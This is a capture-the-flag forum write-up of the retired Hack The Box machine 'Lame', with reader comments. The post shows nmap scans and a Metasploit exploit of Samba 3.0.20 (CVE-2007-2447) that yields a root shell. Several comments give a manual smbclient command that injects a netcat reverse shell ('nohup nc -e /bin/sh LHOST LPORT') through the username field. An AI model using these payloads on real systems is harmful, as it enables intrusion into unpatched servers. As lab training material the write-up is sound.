Lame write-up by Arrexel

edited October 2017 in Writeups

I will be covering write-ups of all retired machines, so stay tuned for future posts!

Enumeration

As always, let's start by enumerating running services on the target:

Nmap

nmap -T4 -A -v 10.10.10.3

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 15:29 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating Ping Scan at 15:29
Scanning 10.10.10.3 [4 ports]
Completed Ping Scan at 15:29, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:29
Completed Parallel DNS resolution of 1 host. at 15:29, 0.02s elapsed
Initiating SYN Stealth Scan at 15:29
Scanning 10.10.10.3 [1000 ports]
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Completed SYN Stealth Scan at 15:29, 11.30s elapsed (1000 total ports)
Initiating Service scan at 15:29
Scanning 4 services on 10.10.10.3
Completed Service scan at 15:29, 11.36s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.3
Retrying OS detection (try #2) against 10.10.10.3
Initiating Traceroute at 15:29
Completed Traceroute at 15:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:29
Completed Parallel DNS resolution of 2 hosts. at 15:29, 0.02s elapsed
NSE: Script scanning 10.10.10.3.
Initiating NSE at 15:29
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 15:30, 40.10s elapsed
Initiating NSE at 15:30
Completed NSE at 15:30, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (91%), Dell Integrated Remote Access Controller (iDRAC6) (91%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (91%), Linux 2.4.21 - 2.4.31 (likely embedded) (91%), Linux 2.4.27 (91%), Citrix XenServer 5.5 (Linux 2.6.18) (91%), Linux 2.6.22 (91%), Linux 2.6.8 - 2.6.30 (91%), Dell iDRAC 6 remote access controller (Linux 2.6) (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.311 days (since Fri Sep 15 08:02:47 2017)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-17T14:57:26-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   123.67 ms 10.10.14.1
2   123.15 ms 10.10.10.3

So there is vsFTPd 2.3.4, which allows anonymous login in this instance. SSH is open, and so is Samba (version 3.0.20).

Samba

Metasploit has some neat modules for enumerating a few things related to Samba. Lets check out the named pipes, in case there is anything of interest.

msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options

Module options (auxiliary/scanner/smb/pipe_auditor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(pipe_auditor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf auxiliary(pipe_auditor) > run

[*] 10.10.10.3:139        - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploitation

vsFTPd

Right off the bat, a quick search for vsFTPd 2.3.4 shows that it had a built-in backdoor briefly for this version, and wouldn't you know, there is a Metasploit module for it.

exploit/unix/ftp/vsftpd_234_backdoor

msf auxiliary(smb_version) > use exploit/unix/ftp/vsftpd_234_backdoor 
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Darn, no luck. This copy must not contain the backdoor. A quick login and check as the anonymous FTP user gets us nowhere. We are jailed to an empty directory.

Samba

Another quick search for Samba 3.0.20 reveals CVE-2007-2447, which is an RCE vulnerability that requires no authentication. Metasploit also conveniently has a built-in module for this, so let's give it a shot.

Metasploit

exploit/multi/samba/usermap_script

msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.3:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0MefBteS03VkpAjA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0MefBteS03VkpAjA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:55479) at 2017-09-17 15:52:35 -0400

pwd
/
whoami
root

Bingo! We are in as the root user. From here we just grab our flags from /home/makis/user.txt and /root/root.txt

Arrexel

Tagged:

Comments

  • Nice one dude thanks for sharing

    Goutsou

  • And for those who like to do things manually or they aren't allowed to use metasploit:
    smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

  • Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
    nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

    SirenCeol

  • great write up

    buckko

  • @alamot said:
    And for those who like to do things manually or they aren't allowed to use metasploit:
    smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

    Thumbs up to both of you

    technobro

  • Can you please provide the "manual exploitation (exploit db exploit) process" as well for all of your tutorials??

    Goutsou

  • @goutsou said:
    Can you please provide the "manual exploitation (exploit db exploit) process" as well for all of your tutorials??

    Yea I will be adding that to them all from now on, will fix lame/legacy after I finish my next one.

    Arrexel

  • @alamot said:
    And for those who like to do things manually or they aren't allowed to use metasploit:
    smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

    Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

    The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can't seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max--protocol options.

    I'm simply trying to ping my machine before getting onto the reverse shell part but I can't seem to trigger the payload, can you please confirm if your command above works for you?

    Thanks and keep up the good work guys :)

    ps. I'm aware the displayed command is HTML encoded

  • edited March 9

    @ps3tsuneo Those html entities didn't show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

  • @ps3tsuneo said:

    @alamot said:
    And for those who like to do things manually or they aren't allowed to use metasploit:
    smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

    Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

    The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can't seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max--protocol options.

    I'm simply trying to ping my machine before getting onto the reverse shell part but I can't seem to trigger the payload, can you please confirm if your command above works for you?

    Thanks and keep up the good work guys :)

    ps. I'm aware the displayed command is HTML encoded

    @alamot said:
    @ps3tsuneo Those html entities didn't show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

    Thanks a lot @alamot ! I did manage to make it work yesterday. Dont know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

    Also had to modify the command a bit to append a "." at the beginning (smbclient -U "./=`nohup nc -e /bin/sh LHOST LPORT`" -N -I 10.10.10.3 -p 139 //LAME/tmp)

    Thanks for your quick reply!

  • @SirenCeol said:
    Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
    nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

    This one returns:
    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false

    why?

    halfluke

  • @ps3tsuneo said:

    @ps3tsuneo said:

    @alamot said:
    And for those who like to do things manually or they aren't allowed to use metasploit:
    smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

    Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.

    The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can't seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max--protocol options.

    I'm simply trying to ping my machine before getting onto the reverse shell part but I can't seem to trigger the payload, can you please confirm if your command above works for you?

    Thanks and keep up the good work guys :)

    ps. I'm aware the displayed command is HTML encoded

    @alamot said:
    @ps3tsuneo Those html entities didn't show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

    Thanks a lot @alamot ! I did manage to make it work yesterday. Dont know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

    Also had to modify the command a bit to append a "." at the beginning (smbclient -U "./=`nohup nc -e /bin/sh LHOST LPORT`" -N -I 10.10.10.3 -p 139 //LAME/tmp)

    Thanks for your quick reply!

    Can you please explain how you disabled spnego?
    --option="client use spnego = no" not working here

    halfluke

  • I disabled it in /etc/samba/smb.conf, rebooted Kali and still not working

    halfluke

  • I am new so sorry if this too noob of a question.

    The msf's smb/pipe_auditor shows me different output than what you have in the write-up. Here's what it looks like.

    msf auxiliary(scanner/smb/pipe_auditor) > run

    [] Scanned 1 of 1 hosts (100% complete)
    [
    ] Auxiliary module execution completed
    msf auxiliary(scanner/smb/pipe_auditor) >

    What am I doing wrong here?
    Thanks.

  • edited September 24

    "client use spnego = no" in the smb.conf file does not work for me ether... the result of the connection is the following:

    session request ok
    negotiated dialect[NT1] against server[10.10.10.3]
    NT1 login failed: NT_STATUS_LOGON_FAILURE
    session setup failed: NT_STATUS_LOGON_FAILURE

    If no "client use spnego = no" setting is set, the result is:

    gensec_update_done: ntlmssp[0x16ddf20]: NT_STATUS_OK tevent_req[0x16dbe40/../auth/ntlmssp/ntlmssp.c:181]: state[2] error[0 (0x0)] state[struct gensec_ntlmssp_update_state (0x16dbf20)] timer[(nil)] finish[../auth/ntlmssp/ntlmssp.c:222]
    gensec_update_done: spnego[0x16dd440]: NT_STATUS_MORE_PROCESSING_REQUIRED tevent_req[0x16ddad0/../auth/gensec/spnego.c:1601]: state[2] error[0 (0x0)] state[struct gensec_spnego_update_state (0x16ddbb0)] timer[(nil)] finish[../auth/gensec/spnego.c:2070]
    SPNEGO login failed: The attempted logon is invalid. This is either due to a bad username or authentication information.
    session setup failed: NT_STATUS_LOGON_FAILURE

  • edited September 24

    Ok, found another (almost the same) manual way which worked for me:

    Setup listener:

    ~# nc -nvlp LPORT
    

    Connect to the Lame using Smbclient:

    ~# smbclient //10.10.10.3/tmp
    Enter WORKGROUP\root's password: {Hit Enter}
    Anonymous login successful
    Try "help" to get a list of possible commands.
    smb: \> 
    

    Execute payload within SMB session:

    smb: \> logon "./=`nohup nc -e /bin/sh LHOST LPORT`"
    Password: {Hit Enter}
    

    Done. You should receive the connection to your listener:

    listening on [any] 4444 ...
    10.10.10.3: inverse host lookup failed: Unknown host
    connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.3] 57347
    ls /root/
    Desktop
    reset_logs.sh
    root.txt
    vnc.log
    
  • @SirenCeol said:
    Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
    nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

    The aggressive scan from Nmap (also known as -A) is the same thing as -sC -sV --traceroute, but it may be change in the future (according to the Nmap Docs). So do not need specify -sC at command line whether -A is present.

Sign In or Register to comment.